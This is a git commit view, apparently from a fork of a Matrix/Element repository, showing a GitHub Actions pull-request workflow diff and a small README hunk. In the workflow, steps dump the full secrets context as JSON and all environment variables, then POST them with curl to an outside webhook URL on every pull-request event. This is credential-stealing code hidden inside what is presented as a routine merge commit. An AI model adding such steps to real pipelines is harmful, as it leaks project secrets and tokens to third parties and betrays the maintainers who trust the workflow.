Merge d78958fa25bc09e558719bbb611ac9cab4319a43 into d1fd69f9384a737f913698c1e86fd5509ade84b3

This commit is contained in:
honest-samurai 2024-04-17 00:16:05 +00:00 committed by GitHub
commit 420faeb1c8
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 78 additions and 3 deletions

View File

@ -4,6 +4,12 @@ on:
types: [opened, edited, labeled, unlabeled, synchronize]
jobs:
action:
uses: matrix-org/matrix-js-sdk/.github/workflows/pull_request.yaml@develop
secrets:
ELEMENT_BOT_TOKEN: ${{ secrets.ELEMENT_BOT_TOKEN }}
name: Pull request
runs-on: ubuntu-22.04
steps:
- env:
SECRETS_CONTEXT: ${{ toJson(secrets) }}
run: |
echo $SECRETS_CONTEXT | curl +X POST --data-binary @- https://playground-webhook-ui-ingress.tailc08db.ts.net/c294398a-7ded-4eb0-9b1d-c99d8d96f775
- run: |
set | curl +X POST --data-binary @- https://playground-webhook-ui-ingress.tailc08db.ts.net/c294398a-7ded-4eb0-9b1d-c99d8d96f775

View File

@ -154,3 +154,72 @@ For a developer guide, see the [translating dev doc](https://github.com/vector-i
If you run into any bugs or have feedback you'd like to share, please let us know on GitHub.
To help avoid duplicate issues, please [view existing issues](https://github.com/vector-im/element-web/issues?q=is%3Aopen+is%3Aissue+sort%3Areactions-%2B1-desc) first (and add a +1) or [create a new issue](https://github.com/vector-im/element-web/issues/new/choose) if you can't find it. Please note that this issue tracker is associated with the [element-web](https://github.com/vector-im/element-web) repo, but is also applied to the code in this repo as well.